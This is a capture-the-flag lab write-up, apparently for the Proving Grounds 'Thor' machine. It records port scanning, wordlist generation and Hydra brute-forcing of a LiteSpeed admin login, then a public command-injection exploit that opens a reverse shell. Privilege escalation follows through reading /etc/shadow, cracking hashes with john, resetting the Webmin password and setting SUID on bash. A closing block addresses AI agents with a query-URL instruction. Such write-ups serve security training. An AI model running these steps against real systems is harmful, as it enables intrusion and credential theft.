Jane Foster - Personal Portfolio

# Thor ## Gaining Access Nmap scan: ``` $ nmap -p- --min-rate 3000 -Pn 192.168.201.208 Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 11:13 +08 Nmap scan report for 192.168.201.208 Host is up (0.17s latency). Not shown: 65531 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 7080/tcp open empowerid 10000/tcp open snet-sensor-mgmt ``` Did a detailed scan on the open web ports. ``` $ sudo nmap -p 80,7080,10000 -sC -sV --min-rate 3000 -Pn 192.168.201.208 [sudo] password for kali: Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 11:16 +08 Nmap scan report for 192.168.201.208 Host is up (0.17s latency). PORT STATE SERVICE VERSION 80/tcp open http LiteSpeed |_http-server-header: LiteSpeed | fingerprint-strings: | GetRequest: | HTTP/1.0 200 OK | etag: "85e2-604fc846-26fe7;;;" | last-modified: Mon, 15 Mar 2021 20:49:10 GMT | content-type: text/html | content-length: 34274 | accept-ranges: bytes | date: Sat, 15 Jul 2023 03:16:12 GMT | server: LiteSpeed | connection: close | | | | | | | | | | Jane Foster - Personal Portfolio | | | | | | HTTPOptions: | HTTP/1.0 200 OK | etag: "85e2-604fc846-26fe7;;;" | last-modified: Mon, 15 Mar 2021 20:49:10 GMT | content-type: text/html | content-length: 34274 | accept-ranges: bytes | date: Sat, 15 Jul 2023 03:16:13 GMT | server: LiteSpeed | connection: close | | | | | | | | | | Jane Foster - Personal Portfolio | | | | |_ |_http-title: Jane Foster - Personal Portfolio 7080/tcp open ssl/empowerid LiteSpeed |_ssl-date: TLS randomness does not represent time | tls-alpn: | h2 | spdy/3 | spdy/2 |_ http/1.1 | ssl-cert: Subject: commonName=ubuntu/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US | Not valid before: 2022-06-07T09:39:58 |_Not valid after: 2024-09-04T09:39:58 | fingerprint-strings: | GetRequest: | HTTP/1.0 302 Found | x-powered-by: PHP/5.6.36 | x-frame-options: SAMEORIGIN | x-xss-protection: 1;mode=block | referrer-policy: same-origin | x-content-type-options: nosniff | set-cookie: LSUI37FE0C43B84483E0=6bde28c9fc90fbd8dbd0956db348c0f6; path=/; secure; HttpOnly | expires: Thu, 19 Nov 1981 08:52:00 GMT | cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | pragma: no-cache | set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | location: /login.php | content-type: text/html; charset=UTF-8 | content-length: 0 | date: Sat, 15 Jul 2023 03:16:30 GMT | server: LiteSpeed | alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080"; | HTTPOptions: | HTTP/1.0 302 Found | x-powered-by: PHP/5.6.36 | x-frame-options: SAMEORIGIN | x-xss-protection: 1;mode=block | referrer-policy: same-origin | x-content-type-options: nosniff | set-cookie: LSUI37FE0C43B84483E0=58c6a8490e64410d0e090353ed826ba0; path=/; secure; HttpOnly | expires: Thu, 19 Nov 1981 08:52:00 GMT | cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | pragma: no-cache | set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ | location: /login.php | content-type: text/html; charset=UTF-8 | content-length: 0 | date: Sat, 15 Jul 2023 03:16:31 GMT | server: LiteSpeed |_ alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080"; | http-title: LiteSpeed WebAdmin Console |_Requested resource was /login.php |_http-server-header: LiteSpeed 10000/tcp open http MiniServ 1.962 (Webmin httpd) |_http-server-header: MiniServ/1.962 |_http-title: Site doesn't have a title (text/html; Charset=utf-8). ``` ### Wordlist + Brute Force -> Creds + RCE Port 80 hosted a portfolio page for Jane Foster:

At the bottom of the page, there was some contact details:

The box was named Thor, so it makes sense that there would be something 'Thor' related. From the earlier `nmap` scan, we know that port 80 is running using Litespeed. Port 7080 is the LiteSpeed admin console, likely operated by this Jane Foster. Port 7080 reveals a login page:

There are some exploits available for this: ``` $ searchsploit openlitespeed ----------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------- --------------------------------- OpenLitespeed 1.3.9 - Use-After-Free (Denial of Service) | linux/dos/37051.c Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting | multiple/webapps/49727.txt Openlitespeed Web Server 1.7.8 - Command Injection (Authen | multiple/webapps/49483.txt Openlitespeed WebServer 1.7.8 - Command Injection (Authent | multiple/webapps/49556.py ----------------------------------------------------------- --------------------------------- ``` One of which is an RCE exploit, but it requires credentials. Weak credentials don't work here, so we need to get crafty. We know that 'Jane Foster' is the one operating this webpage. So let's create a custom wordlist present. ``` $ cewl http://192.168.201.208 -d 5 --with-numbers > wordlist ``` I tried to use Hydra to brute force this, but it didn't work either. I took a hint and it told me to keep brute forcing, so in this case we can try the permutation of words within our `wordlist` file. ```python import itertools filename = 'wordlist' permutations = [] with open(filename, 'r') as file: wordlist = [line.strip() for line in file] for combination in itertools.permutations(wordlist, 2): permutation = ''.join(combination) print(permutation) ``` This would combine two of the words together. Then, we can brute force again with Hydra. ``` $ hydra -l admin -P permutated.txt -s 7080 -t 64 192.168.201.208 https-post-form "/login.php:userid=admin&pass=^PASS^:Invalid credential" -v [7080][http-post-form] host: 192.168.201.208 login: admin password: Foster2020 ``` This would find the correct password. We can then use the RCE exploit: ``` $ python3 49556.py 192.168.201.208:7080 admin Foster2020 shadow [+] Authentication was successful! [+] Version is detected: OpenLiteSpeed 1.7.8 [+] The target is vulnerable! [+] tk value is obtained: 0.51264900 1689392604 [+] Sending reverse shell to 127.0.0.1:4444 ... [+] Triggering command execution.. ```

## Privilege Escalation ### Shadow Group -> Thor Creds We are part of the `shadow` group, meaning we can read `/etc/shadow`: {% code overflow="wrap" %} ``` $ cat /etc/shadow root:$6$XRJJB9j7GYzWvjBy$yZEsOS3cam1DG.eI26bW1TERw5SV7b3RVZQHZB7UFzKNyPR6PPUFfxzclKsiGUT8.WoL7vQ4hhNmekav68kwN1:19150:0:99999:7::: thor:$6$l2ThCEsvmrzmkKIA$FWtAb1SsYFqAXA96Ze4uGTHtPV9HNi7ShAgoTet1gx.HvkEFePp.Bk/uBeuxpCMz/X3jXWbGavj11po9H/FzP.:19150:0:99999:7::: ``` {% endcode %} We can try to crack the hashes alone using `john` for these users. The hash for `thor` can be cracked while the one for `root` cannot. ``` $ john --show hashes ?:valkyrie 1 password hash cracked, 1 left ``` We can then `ssh` in as `thor`:

### Sudo Webmin -> Webmin RCE `thor` can restart the Webmin instance as `root`: ``` thor@Lite:~$ sudo -l Matching Defaults entries for thor on lite: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User thor may run the following commands on lite: (root) NOPASSWD: /usr/bin/systemctl restart webmin ``` I almost forgot there was a Webmin instance. ``` thor@Lite:~$ ps -elf | grep webmin 1 S root 1202 1 0 80 0 - 9474 - 03:13 ? 00:00:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf 0 S thor 13415 13303 0 80 0 - 1608 pipe_w 03:51 pts/0 00:00:00 grep --color=auto webmin ``` Using our access, we can actually reset the Webmin password. {% embed url="" %} However, it appears that only the `bin` group has access to the `/etc/webmin` group: ``` thor@Lite:~$ ls -la /etc/webmin/ total 536 drwxr-xr-x 116 root root 4096 Jun 7 2022 . drwxr-xr-x 101 root root 4096 Jul 15 03:43 .. drwx--x--x 2 root bin 4096 Jun 7 2022 acl drwx--x--x 2 root bin 4096 Jun 7 2022 adsl-client drwx--x--x 2 root bin 4096 Jun 7 2022 ajaxterm ``` Earlier, the RCE exploit for OpenLiteSpeed required us to specify a GroupID, of which I specified `shadow` as the default. We can try specifying bin and using that shell to reset the password. ``` $ python3 49556.py 192.168.201.208:7080 admin Foster2020 bin [+] Authentication was successful! [+] Version is detected: OpenLiteSpeed 1.7.8 [+] The target is vulnerable! [+] tk value is obtained: 0.02467200 1689393257 [+] Sending reverse shell to 127.0.0.1:4444 ... [+] Triggering command execution... ```

Then we can reset the password and restart Webmin as `thor`: ``` nobody@Lite:/usr/bin$ /usr/share/webmin/changepass.pl /etc/webmin root toor Updated password of Webmin user root Webmin is not running - cannot refresh configuration thor@Lite:~$ sudo /usr/bin/systemctl restart webmin ``` Using this, we can login to Webmin and view the dashboard:

Within Webmin, there's a `>_` option, which spawns a command line instance within the browser:

We can just do `chmod u+s /bin/bash`, and get a proper `root` shell using `ssh`.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://rouvin.gitbook.io/ibreakstuff/writeups/proving-grounds-practice/linux/thor.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.